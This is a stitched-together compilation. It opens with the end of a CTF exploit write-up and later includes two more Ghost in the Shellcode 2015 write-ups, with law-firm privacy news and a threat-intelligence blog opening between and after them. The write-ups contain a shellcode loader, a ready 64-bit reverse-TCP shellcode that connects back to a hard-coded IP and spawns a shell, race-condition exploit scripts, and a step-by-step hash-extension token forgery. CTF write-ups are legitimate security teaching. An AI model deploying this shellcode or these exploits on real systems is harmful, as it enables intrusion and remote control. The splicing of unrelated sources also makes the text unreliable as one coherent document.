What you're probably thinking is that I can implement a multiplexer in their assembly language. I could have some operands like "write this dword to this memory address" and build up the shellcode by calling the function multiple times with multiple arguments.

If you're thinking that, then you're sharper than I was at 7am with no sleep! I decided that the best way was to write a shellcode loader in 24 bytes. I actually love writing short, custom-purpose shellcode, there's something satisfying about it. :)

Here's my loader shellcode:

  # Create some loader shellcode. I'm not proud of this - it was 7am, and I hadn't
  # slept yet. I immediately realized after getting some sleep that there was a
  # way easier way to do this...
  params =
    # param0 gets overwritten, just store crap there
    "\x41\x41\x41\x41" +

    # param1 + param2 are the return address
    [@@rwx_addr & 0x00000000FFFFFFFF, @@rwx_addr >> 32].pack("II") +

    # ** Now, we build up to 24 bytes of shellcode that'll load the actual shellcode

    # Decrease ECX to a reasonable number (somewhere between 200 and 10000, doesn't matter)
    "\xC1\xE9\x10" +  # shr ecx, 0x10

    # This is where the shellcode is read from - to save a couple bytes (an absolute move is 10
    # bytes long!), I use r12, which is in the same image and can be reached with a 4-byte add
    "\x49\x8D\xB4\x24\x88\x2B\x20\x00" + # lea rsi,[r12+0x202b88]

    # This is where the shellcode is copied to - immediately after this shellcode
    "\x48\xBF" + [@@rwx_addr + 24].pack("Q") + # mov rdi, @@rwx_addr + 24

    # And finally, this moves the bytes over
    "\xf3\xa4" # rep movsb

  # Pad the shellcode with NOP bytes so it can be used as an array of ints
  while((params.length % 4) != 0)
    params += "\x90"
  end

  # Convert the shellcode to an array of ints
  params = params.unpack("I*")

Basically, the first three arguments are wasted (the first gets messed up and the next two are the return address). Then we set up a call to "rep movsb", with rsi, rdi, and rcx set appropriately (and complicatedly). You can see how I did that in the comments. All told, it's 23 bytes of machine code.

It took me a lot of time to get that working, though! Squeezing out every single byte! It basically copies the code from the next bytecode function (whose address I can calculate based on r12) to the address immediately after itself in the +RWX memory (which I can leak beforehand).

This code is written to the +RWX memory using these operations:

  ops = []

  # Overwrite the return address with the first two operations
  ops << create_op(OP_MOV, 26, 1)
  ops << create_op(OP_MOV, 27, 2)

  # This next bunch copies shellcode from the arguments into the +rwx memory
  ops << create_op(OP_MOV, ((@@rwx_addr + 0) - @@registers) / 4, 3)
  ops << create_op(OP_MOV, ((@@rwx_addr + 4) - @@registers) / 4, 4)
  ops << create_op(OP_MOV, ((@@rwx_addr + 8) - @@registers) / 4, 5)
  ops << create_op(OP_MOV, ((@@rwx_addr + 12) - @@registers) / 4, 6)
  ops << create_op(OP_MOV, ((@@rwx_addr + 16) - @@registers) / 4, 7)
  ops << create_op(OP_MOV, ((@@rwx_addr + 20) - @@registers) / 4, 8)
  ops << create_op(OP_MOV, ((@@rwx_addr + 24) - @@registers) / 4, 9)

Then I just convert the shellcode into a bunch of bytecode operators/operands, which will be the entirety of the fourth bytecode function (I'm proud to say that this code worked on the first try):

  # Pad the shellcode to the proper length
  shellcode = SHELLCODE
  while((shellcode.length % 26) != 0)
    shellcode += "\xCC"
  end

  # Now we create a new function, which simply stores the actual shellcode.
  # Because this is a known offset, we can copy it to the +rwx memory with
  # a loader
  ops = []

  # Break the shellcode into 26-byte chunks (the size of an operation)
  shellcode.chars.each_slice(26) do |slice|
    # Make the character array into a string
    slice = slice.join

    # Split it into the right proportions
    a, b, c, d = slice.unpack("SQQQ")

    # Add them as a new operation
    ops << create_op(a, b, c, d)
  end

  # Add the operations to a new function (no offset, since we just need to
  # get it stored, not run as bytecode)
  add(s, ops, 16)

And, for good measure, here's my 64-bit connect-back shellcode:

# Port 17476, chosen so I don't have to think about endianness at 7am at night :)
REVERSE_PORT = "\x44\x44"

# 206.220.196.59
REVERSE_ADDR = "\xCE\xDC\xC4\x3B"

# Simple reverse-tcp shellcode I always use
SHELLCODE = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
"\x02" + REVERSE_PORT + "\xc7\x44\x24\x04" + REVERSE_ADDR + "\x48\x89\xe6\x6a\x10" +
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
"\x5f\x6a\x3b\x58\x0f\x05"

It's slightly modified from some code I found online. I'm mostly just including it so I can find it again next time I need it. :)

Conclusion

To summarize everything...

There was an off-by-one vulnerability in the verifyBytecode() function. I used that to break out of the sandbox and run unverified bytecode.

That bytecode allowed me to read/write/execute arbitrary memory. I used it to leak the base address of the binary, the base address of the register array (where my reads/writes are relative to), and the address of some +RWX memory.

I copied loader code into that +RWX memory, then ran it. It copied the next bytecode function, as actual machine code, to the +RWX memory.

Then I got a shell.

Hope that was useful!

FTC Releases Report on Internet of Things

On January 27, 2015, the Federal Trade Commission announced the release of a report on the Internet of Things: Privacy and Security in a Connected World (the “Report”). The Report describes the current state of the Internet of Things, analyzes the benefits and risks of its development, applies privacy principles to the Internet of Things and discusses whether legislation is needed to address this burgeoning area. The Report follows a workshop by the FTC on this topic in November 2013.

The first part of the Report acknowledges the explosive growth of the Internet of Things, noting that there will be 25 billion Internet-connected devices by the end of 2015 and 50 billion such devices by 2020. These devices range from cameras to home automation systems to bracelets.

Next, the Report discusses the benefits and risks of the Internet of Things. The benefits highlighted include developments such as:

  • insulin pumps and blood pressure cuffs that can track an individual’s vital signs and submit the data to health care providers;
  • smart meters that help homeowners conserve energy; and
  • connected cars that can diagnose problems with the vehicle.

The risks that accompany such connected devices include:

  • an unauthorized person accessing and misusing personal information of the user of the connected device;
  • a hacker infiltrating the network to which the device is connected and wreaking havoc; and
  • safety risks to the individual user, such as a risk of a third party accessing a vehicle while it is being driven and altering the braking system.

The Report’s discussion of privacy principles contains the following recommendations on these critical areas:

  • data security – companies should incorporate “security by design” similar to the concept of “privacy by design” and take additional steps such as encrypting sensitive health information;
    • the concept of “security by design” was emphasized in the FTC’s settlement with TRENDnet, an Internet camera company;
  • data minimization – companies can accomplish this by “mindfully considering data collection and retention policies and engaging in a data minimization exercise;”
  • notice and choice – companies should only be required to notify consumers and offer them a choice for uses of their information that are inconsistent with consumer expectations;
    • companies can obviate notice and choice issues by de-identifying data because there is no need to offer consumers choices regarding data that cannot be traced to them.

With respect to legislation, the FTC “does not believe that the privacy and security risks, though real, need to be addressed” by legislation or regulation at this time. Though it does not advocate legislation, the FTC intends to engage more vigorously in the Internet of Things arena by (1) using its enforcement authority, (2) developing consumer and business education materials, (3) convening multistakeholder groups to discuss important issues, and (4) advocating its recommendations with relevant federal and state government entities.

In announcing the report, FTC Chairwoman Edith Ramirez stated that “by adopting the best practices [the FTC] laid out, businesses will be better able to provide consumers the protections they want and allow the benefits of the Internet of Things to be fully realized.”

Read the FTC’s report.

Risk-Based Approach – New Thinking for Regulating Privacy

On February 11, 2015, the International Association of Privacy Professionals Australia New Zealand (“iappANZ”) will host a discussion on the risk-based approach to privacy in Sydney, Australia. Richard Thomas, Global Strategy Advisor for the Centre for Information Policy Leadership at Hunton & Williams (the “Centre”), will present the Centre’s contributions to this topic, including the outcomes from the workshops held in Paris and Brussels. Other guest speakers include Timothy Pilgrim, Australian Privacy Commissioner; Dr. Elizabeth Coombs, New South Wales Privacy Commissioner; and Olga Ganopolsky, General Counsel of Privacy and Data at Macquarie Group Limited. Together, they will discuss the benefits and challenges of a risk-based approach and the implications for businesses and regulators.

For more information and to register for the event, please visit iappANZ’s website.

Federal Court Grants Partial Summary Judgment to Government in an Action Against Dish Network Alleging Telemarketing Violations

On January 21, 2015, the Federal Trade Commission announced that the U.S. District Court for the Central District of Illinois granted partial summary judgment on December 12, 2014, to the federal government in its action against Dish Network LLC (“Dish”), alleging that Dish violated certain aspects of the Telemarketing Sales Rule (“TSR”) that restrict placing calls to numbers on the National Do-Not-Call Registry and an entity’s internal Do-Not-Call list. The federal government is joined in the action against Dish by four state attorneys general alleging violations of the Telephone Consumer Protection Act and certain state laws related to telemarketing.

The government’s complaint stated that Dish directly telemarketed, and contracted with several “authorized dealers” to telemarket, Dish’s products, which primarily include satellite television programming. The government alleged that Dish, either directly or through its authorized dealers, placed millions of calls to numbers that were on the National Do-Not-Call Registry or on Dish’s internal Do-Not-Call list, both of which constituted violations of the TSR. Among other defenses, Dish argued that it was not responsible for its authorized dealers’ violations of the TSR because the company’s authorized dealers are independent contractors. The court was not persuaded by Dish’s argument, however, because Dish retained the relevant entities and authorized them to market Dish’s products. Thus, the court granted summary judgment to the plaintiffs with respect to Dish’s liability for the calls placed by certain of Dish’s authorized retailers.

Due to the existence of issues of fact, the court held that it could not grant summary judgment regarding the remedies available to the action’s plaintiffs. In their motion for summary judgment, which alleged 65 million impermissible calls, the federal government and four attorneys general claimed that the resulting civil penalty would be more than $725 billion. Although they acknowledged that “a smaller penalty is appropriate,” they also stated that a substantial award “was justified in light of Dish’s extraordinary culpability” and “poor compliance history.” They further noted that a $1 billion penalty “represents a mere 0.15% of the maximum penalty.”

German DPA Appeals Court Decision on Facebook Fan Pages and Suggests Clarification by ECJ on Data Controllership

On January 14, 2015, the data protection authority of the German federal state of Schleswig-Holstein (“Schleswig DPA”) issued an appeal challenging a September 4, 2014 decision by the Administrative Court of Appeals, which held that companies using Facebook’s fan pages cannot be held responsible for data protection law violations committed by Facebook because the companies do not have any control over the use of the data.

The Schleswig DPA claimed that because companies create the fan pages, they are responsible for the data collected and processed by Facebook through the fan pages for purposes such as behavioral advertising. The Schleswig DPA also alleged that the court failed to (1) examine Facebook’s business model, (2) assess technical details related to the functioning of fan pages, and (3) consider the social use of fan pages. The Schleswig DPA argued that the Court of Appeals is in an appropriate position to rule and review decisions of lower courts only after it addresses the three issues above. In addition, the Schleswig DPA stated that Facebook’s business model violates a number of provisions in the German Telemedia Act, including the sections related to user profiling. The Schleswig DPA also suggested that if the court does not concur with the Schleswig DPA’s interpretation of EU data protection law regarding data controllership on social networking websites, the case should be referred to the European Court of Justice (“ECJ”) for a preliminary ruling. An ECJ preliminary ruling is a decision regarding the interpretation of European Union law at the request of an EU member state court.

ENISA Issues Report on Implementation of Privacy and Data Protection by Design

On January 12, 2015, the European Union Agency for Network and Information Security (“ENISA”) published a report on Privacy and Data Protection by Design – from policy to engineering (the “Report”). The “privacy by design” principle emphasizes the development of privacy protections at the early stages of the product or service development process, rather than at later stages. Although the principle has found its way into some proposed legislation (e.g., the proposed EU General Data Protection Regulation), its concrete implementation remains presently unclear. Hence, the Report aims to promote a discussion on how the principle can be implemented concretely and effectively with the help of engineering methods.

The Report provides an overview of the ways in which businesses have implemented the “privacy by design” principle in their products and services. To this end, the Report reviews existing approaches and strategies to implement privacy by design, and gives a structured overview of twelve important privacy techniques (such as authentication, attribute-based credentials, encrypted communications, anonymity and pseudonymity). Further, the Report presents the challenges and limitations of “by-design” principles for privacy and data protection.

The Report concludes with a number of recommendations that address system developers, service providers, data protection authorities (“DPAs”) and policy makers on how to overcome and mitigate these limits. The main recommendations include:

  • Policymakers should support the development of new incentive mechanisms for privacy-friendly services and need to promote them (e.g., the establishment of audit schemes and seals to enable the customer to make informed choices, and the establishment of penalties for those who disregard or obstruct privacy-friendly solutions);
  • The research community should further investigate privacy engineering, especially with a multidisciplinary approach;
  • Software developers and the research community should offer tools that enable the intuitive implementation of privacy properties. These tools should integrate freely available and maintained components with open interfaces and application programming interfaces;
  • DPAs should play an important role in providing independent guidance and assessing modules and tools for privacy engineering, such as in the promotion of privacy-enhancing technologies and the implementation of the transparency principle;
  • Legislators should promote privacy and data protection in their norms, building on the European legal framework for data protection; and
  • Standardization bodies should include privacy considerations in the standardization process as part of international standards, and should develop standards for the interoperability of privacy features in order to help users compare the privacy guarantees of different products and services and make compliance checks easier for DPAs.

View the full report.

GitS 2015: aart.php (race condition)

Welcome to my second writeup for Ghost in the Shellcode 2015! This writeup is for the one and only Web level, "aart" (download it). I wanted to do a writeup for this one specifically because, even though the level isn't super exciting, the solution was actually a pretty obscure vulnerability type that you don't generally see in CTFs: a race condition!

But we'll get to that in a bit; first, I want to talk about a wrong path that I spent a lot of time on. :)

The wrong path

If you aren't interested in the trial-and-error process, you can skip this section—don't worry, you won't miss anything useful.

I like to think of myself as being pretty good at Web stuff. I mean, it's a large part of my job and career. So when I couldn't immediately find the vulnerability on a small PHP app, I felt like a bit of an idiot.

I immediately noticed a complete lack of cross-site scripting and cross-site request forgery protections, but those don't lead to code execution, so I needed something more. I also immediately noticed an auth bypass vulnerability, where the server would tell you the password for a chosen user if you simply tried to log in and typed the password incorrectly. I also quickly noticed that you could create multiple accounts with the same name! But none of that was ultimately helpful (except the multiple accounts, actually).

Eventually, while scanning code over and over, I noticed this interesting construct in vote.php:

<?php
if($type === "up"){
        $sql = "UPDATE art SET karma=karma+1 where id='$id';";
} elseif($type === "down"){
        $sql = "UPDATE art SET karma=karma-1 where id='$id';";
}

mysqli_query($conn, $sql);
?>

Before that block, $sql wasn't initialized. The block doesn't necessarily initialize it before it's used. That led me to an obvious conclusion: register_globals (aka, "remote administration for Joomla")!

I tried a few things to test it, but because the result of mysqli_query isn't actually used and errors aren't displayed, it was difficult to tell what was happening. I ended up setting up a local version of the challenge on a Debian VM just so I could play around. (I find that having a good debug environment is key to CTF success!)

After getting it going, turning on register_globals, and messing around a bunch, I found a good query I could use:

http://192.168.42.120/vote.php?sql=UPDATE+art+SET+karma=1000000+where+id='1'

That worked on my test app, so I confidently strode to the real app, ran it, and... nothing happened. Rats. Back to the drawing board.

The real vulnerability

So, the goal of the application was to obtain a user account that isn't restricted. When you create an account, it's immediately set to "restricted" by this code in register.php:

<?php
if(isset($_POST['username'])){
        $username = mysqli_real_escape_string($conn, $_POST['username']);
        $password = mysqli_real_escape_string($conn, $_POST['password']);

        $sql = "INSERT into users (username, password) values ('$username', '$password');";
        mysqli_query($conn, $sql);

        $sql = "INSERT into privs (userid, isRestricted) values ((select users.id from users where username='$username'), TRUE);";
        mysqli_query($conn, $sql);
        ?>
        <h2>SUCCESS!</h2>
        <?php
} else {
[...]
}
?>

Then on the login page, it's checked using this code:

<?php
if(isset($_POST['username'])){
        $username = mysqli_real_escape_string($conn, $_POST['username']);

        $sql = "SELECT * from users where username='$username';";
        $result = mysqli_query($conn, $sql);

        $row = $result->fetch_assoc();
        var_dump($_POST);
        var_dump($row);

        if($_POST['username'] === $row['username'] and $_POST['password'] === $row['password']){
                ?>
                <h1>Logged in as <?php echo($username);?></h1>
                <?php

                $uid = $row['id'];
                $sql = "SELECT isRestricted from privs where userid='$uid' and isRestricted=TRUE;";
                $result = mysqli_query($conn, $sql);
                $row = $result->fetch_assoc();
                if($row['isRestricted']){
                        ?>
                        <h2>This is a restricted account</h2>

                        <?php
                }else{
                        ?>
                        <h2><?php include('../key');?></h2>
                        <?php

                }


        ?>
        <h2>SUCCESS!</h2>
        <?php
        }
} else {
[...]
}

My gut reaction for far too long was that it's impossible to bypass that check, because it only selects rows where isRestricted=true!

But after fighting with the register_globals non-starter above, I realized that if there were no matching rows in the privs table, the query would return zero results and the check would pass, allowing me access! But how to do that?

I went back to the user creation code in register.php and noticed that it creates the user first, then restricts it! There's a lesson for programmers: secure by default.

$sql = "INSERT into users (username, password) values ('$username', '$password');";
mysqli_query($conn, $sql);

$sql = "INSERT into privs (userid, isRestricted) values ((select users.id from users where username='$username'), TRUE);";
mysqli_query($conn, $sql);

That means, if you can create a user account and log in immediately after, before the second query runs, then you can successfully get the key! But I didn't notice that till later, like, today. I actually found another path to exploitation! :)
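
To be concrete, here's a rough sketch (in Python) of what that register/login race could look like. Note this is hypothetical: the login page's filename and the success strings are guesses based on the code above, and it's not the exploit I actually used (that's next):

import random
import threading
import requests

TARGET = "http://aart.2015.ghostintheshellcode.com"

name = "ron" + format(random.randint(0, 0xfffff), "x")
creds = {"username": name, "password": name}

def register():
    # Fires the two INSERTs (users, then privs) on the server
    requests.post(TARGET + "/register.php", data=creds)

def login():
    # Has to land between the two INSERTs to see an unrestricted account
    r = requests.post(TARGET + "/login.php", data=creds)  # filename assumed
    if "Logged in" in r.text and "restricted" not in r.text:
        print(r.text)  # contains the key if we won the race

t1 = threading.Thread(target=register)
t2 = threading.Thread(target=login)
t1.start(); t2.start()
t1.join(); t2.join()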

My exploit

This is where things get a little confusing....

I first noticed there's a similar vulnerability in the code that inserts the account restriction into the privs table. There's no logic in the application to prevent the creation of multiple user accounts with the same name! And, if you create multiple accounts with the same name, it looked like only the first account would ever get restricted.

That was my reasoning, anyways (I don't think that's actually true, but that turned out not to matter). However, on login, only the first account is actually retrieved from the database! My thought was, if you could get those two SQL statements to run concurrently, intertwined between two processes, it might just put things in the right order for an exploit!

Sorry if that's confusing to you—that logic is flawed in like every way imaginable, I realized afterwards, but I implemented the code anyways. Here's the main part (you can grab the full exploit here):

require 'httparty'

TARGET = "http://aart.2015.ghostintheshellcode.com/"
#TARGET = "http://192.168.42.120/"

name = "ron" + rand(100000).to_s(16)

# Fork so both the parent and the child fire the pair of requests,
# doubling the number of registrations racing each other
fork()

# Two threads register the same username as close together as possible
t1 = Thread.new do |t|
  response = (HTTParty.post("#{TARGET}/register.php", :body => { :username => name, :password => name }))
end

t2 = Thread.new do |t|
  response = (HTTParty.post("#{TARGET}/register.php", :body => { :username => name, :password => name }))
end

# Wait for both requests to complete before the process exits
t1.join
t2.join

I ran that against my test host and checked the database. Instead of failing miserably, like it by all rights should have, it somehow caused the second query (the INSERT into privs) to fail entirely! I attempted to log in as the new user, and it gave me the key on my test server.

Honestly, I have no idea why that worked. If I ran it multiple times, it worked somewhere between 1/4 and 1/2 of the time. Not bad, for a race condition! It must have caused a silent SQL error or something, I'm not entirely sure. (One plausible explanation: once two rows exist for the same username, the subselect in the privs INSERT returns more than one row, which is an error in MySQL, so that INSERT fails silently and no restriction row is ever created.)

Anyway, I then tried running it against the real service about 100 times, with no luck. I tried running one instance, then a bunch in parallel. No deal. Hmm! From my home DSL connection it was slowwwwww, so I reasoned that maybe there was just too much lag.

To fix that, I copied the exploit to my server, which has high bandwidth (thanks to SkullSpace for letting me keep my gear there :) ) and ran the same exploit, which worked on the first try! That was it, I had the flag.

Conclusion

I'm not entirely sure why my exploit worked, but it worked great (assuming decent latency)!

I realize this challenge (and story) aren't super exciting, but I like that the vulnerability was due to a race condition. Something nice and obscure, that we hear about and occasionally fix, but almost never exploit. Props to the GitS team for creating the challenge!

And also, if anybody can see what I'm missing, please drop me an email (ron @ skullsecurity.net) and I'll update this blog. I approve all non-spam comments, eventually, but I don't get notifications for them at the moment.

GitS 2015: knockers.py (hash extension vulnerability)

As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote :) ))

The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name :) ).

You can download the original level here (Python).

The vulnerability

To track down the vulnerability, let's have a look at the signature algorithm:

def generate_token(h, k, *pl):
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

In that function, h is a hash function (sha-512, specifically), k is a randomly generated 16-byte secret, and m is the packed 16-bit representations of the ports that the user wishes to open. So if the user wanted to open ports 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).
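
As a quick sanity check of that packing (a two-line Python sketch, nothing more):

import struct

# '!H' packs each port as a big-endian unsigned 16-bit value
m = struct.pack('!HH', 1, 2)
print(m.hex())  # 00010002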

Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!

Let's see how!

Generating a legit token

To use the python script linked above, first run 'setup':

$ python ./knockers.py setup
wrote new secret.txt

Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

$ cat secret.txt
2b396fb91a76307ce31ef7236e7fd3df

Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

$ python ./knockers.py newtoken 80
83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

Notice that the first 512 bits (64 bytes) are the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works!
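
Just to be explicit about the layout, here's that split as a quick Python sketch:

token = bytes.fromhex(
    "83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009"
    "fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2"
    "0050")
mac, m = token[:64], token[64:]  # 64-byte sha512 MAC, then the port list
print(m.hex())  # 0050 -> port 80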

We start the server:

$ python ./knockers.py serve

And in another window, or on another host if you prefer, send the generated token:

$ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

In the original window, you'll see that it was successful:

$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80

Now, let's figure out how to create a token for port 7175!

Generating an illegit (non-legit?) token

So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

Download and compile hash_extender if needed (it definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x50"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).

All said and done, here's the command:

./hash_extender --data-format hex --data 0050 \
  --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
  --append "1c07" --append-format hex \
  -l 16

You can pass in the algorithm and the desired output format as well; if we don't, it'll just output a token for every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.

$ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
Type: sha512
Secret length: 16
New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Type: whirlpool
Secret length: 16
New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

$ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

And checking our server, we see a ton of output, including successfully opening port 7175:

$ python ./knockers.py serve
Client: ::1 len 66
allowing host ::1 on port 80
Client: ::1 len 178
allowing host ::1 on port 80
allowing host ::1 on port 32768
allowing host ::1 on port 0
allowing host ::1 on port 0
[...repeated like 100 times...]
allowing host ::1 on port 0
allowing host ::1 on port 0
allowing host ::1 on port 144
allowing host ::1 on port 7175

And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key.
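
As a footnote, you can sanity-check the forged token offline. hash_extender derives the new signature without knowing the secret, by resuming SHA-512 from the internal state encoded in the original MAC; since plain hashlib can't resume from a state, this little Python sketch cheats and uses the secret from earlier purely to verify that the extended layout is exactly what the server ends up MACing:

import hashlib

# Known only because this is our own test server; a real attacker never sees it
secret = bytes.fromhex("2b396fb91a76307ce31ef7236e7fd3df")
data = bytes.fromhex("0050")    # port 80, the token we were given
append = bytes.fromhex("1c07")  # port 7175, the port we want

# SHA-512 glue padding for the original (secret + data) message: an 0x80 byte,
# zero bytes until the length is 112 mod 128, then a 16-byte big-endian bit count
orig_len = len(secret) + len(data)
glue = (b"\x80"
        + b"\x00" * ((112 - (orig_len + 1)) % 128)
        + (orig_len * 8).to_bytes(16, "big"))

new_msg = data + glue + append
print(hashlib.sha512(secret + new_msg).hexdigest())  # hash_extender's "New signature"
print(new_msg.hex())                                 # hash_extender's "New string"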

Conclusion

This is a pure hash extension vulnerability, which required no special preparation—the hash_extender tool, as written, was perfect for the job!

My favourite part of that is looking at my traffic graph on github:

It makes me so happy when people use my tool, it really does!

Proposed Indiana Law Would Raise Bar for Security and Privacy Requirements

Indiana Attorney General Greg Zoeller has prepared a new bill that, although styled a “security breach” bill, would impose substantial new privacy obligations on companies holding the personal data of Indiana residents. Introduced by Indiana Senator James Merritt (R-Indianapolis) on January 12, 2015, SB413 would make a number of changes to existing Indiana law. For example, it would amend the existing Indiana breach notification law to apply to all data users, rather than owners of databases. The bill also would expand Indiana’s breach notification law to eliminate the requirement that the breached data be computerized for notices to be required.

Most significantly, SB413 would require data users to implement and maintain “reasonable procedures” that prohibit them from “retaining personal information beyond what is necessary for business purposes or compliance with applicable law” and “using personal information for purposes beyond those authorized by law or by the individual to whom the personal information relates.” These requirements are a substantial change from most existing U.S. privacy laws, and designing and implementing the necessary procedures could be a challenge for many companies.

Failure to comply with the bill’s requirements would constitute a deceptive act under state consumer protection law. While only the attorney general may bring an enforcement action, if a court determines that the violation was “done knowingly,” penalties include a fine of $50 for each affected Indiana resident, with a minimum fine of at least $5,000 and maximum fine of $150,000 per deceptive act.

The cap likely will be challenged as being too low during hearings on the bill. In any event, the fines imposed under this new section are cumulative with those available under any other state or federal law, rule or regulation.

SB413 also would require data users to have online privacy policies, and it specifies that those policies must include information as to:

  • whether personal information is collected through the data user’s Internet website;
  • the categories of personal information collected through the data user’s Internet website, if applicable;
  • whether the data user sells, shares or transfers personal information to third parties; and
  • if applicable, whether the data user obtains the express consent of an individual to whom the personal information relates before selling, sharing or transferring the individual’s personal information to a third party.

The bill would explicitly prohibit data users from making a “misrepresentation to an Indiana resident concerning the data user’s collection, storage, use, sharing, or destruction of personal information,” or from requiring a vendor or contractor to do so.

While the bill may well be amended as it moves through the legislative process before the Indiana Senate adjourns on April 29, 2015, it is widely expected to pass. Assuming it does, it will reflect a further significant evolution in state laws regulating information privacy and security, and will add Indiana to the growing list of states moving ahead of federal law in these areas.

China’s State Administration for Industry and Commerce Publishes Measures Defining Consumer Personal Information

On January 5, 2015, the State Administration for Industry and Commerce of the People’s Republic of China published its Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers (the “Measures”). The Measures contain a number of provisions defining circumstances or actions under which enterprise operators may be deemed to have infringed the rights or interests of consumers. These provisions are consistent with the basic rules in the currently effective P.R.C. Law on the Protection of Consumer Rights and Interests (“Consumer Protection Law”). The Measures will take effect on March 15, 2015.

Article 11 of the Measures provides a list of actions that enterprise operators may not undertake because they infringe upon the personal information of consumers. In October 2013, we reported on the amendment to the Consumer Protection Law which extended the protections of personal information to consumer personal information. The list provided in Article 11 of the Measures is similar in concept to the amendment to the Consumer Protection Law.

Although the list itself does not contain any surprises, Article 11 is nevertheless potentially an important development because it provides a definition of “consumer personal information.” (The amendment to the Consumer Protection Law omitted a definition of this term.) According to Article 11, “consumer personal information” refers to “information collected by an enterprise operator during the sale of products or provision of services, that can, singly or in combination with other information, identify a consumer.” Article 11 also provides a list of specific examples of “consumer personal information,” including a consumer’s “name, gender, occupation, birth date, identification card number, residential address, contact information, income and financial status, health status, and consumer status.”

While this definition applies only in relation to consumer personal information, it is an instructive milestone in the continuing emergence of China’s sector-by-sector patchwork of rules and regulations governing the collection and use of personal information.

Beyond the Buzzwords: Why You Need Threat Intelligence

I dislike buzzwords.

Let me be more precise -- I heavily dislike it when a properly useful term is commandeered by the army of marketing people out there and promptly loses any real meaning. It makes me crazy, as it should make you, when a term devised to describe some new method, utility, or technology becomes virtually meaningless because everyone uses it to mean everything and nothing all at once. Being in a highly dynamic technical field is hard enough without having to play thesaurus games with the marketing people. They always win anyway.


So when I see things like this post, "7 Security buzzwords that need to be put to rest," on one hand I'm happy someone is out there taking the over-marketing and over-hyping of good terms to task, but on the other hand I'm apprehensive and left wondering whether we've thrown the baby out with the bathwater.

In this case, if you look at slide 8, Threat Intelligence, you have this quote:
"This is a term that has been knocked about in the industry for the last couple of years. It really amounts to little more than a glorified RSS feed once you peel back the covers for most offerings in the market place."

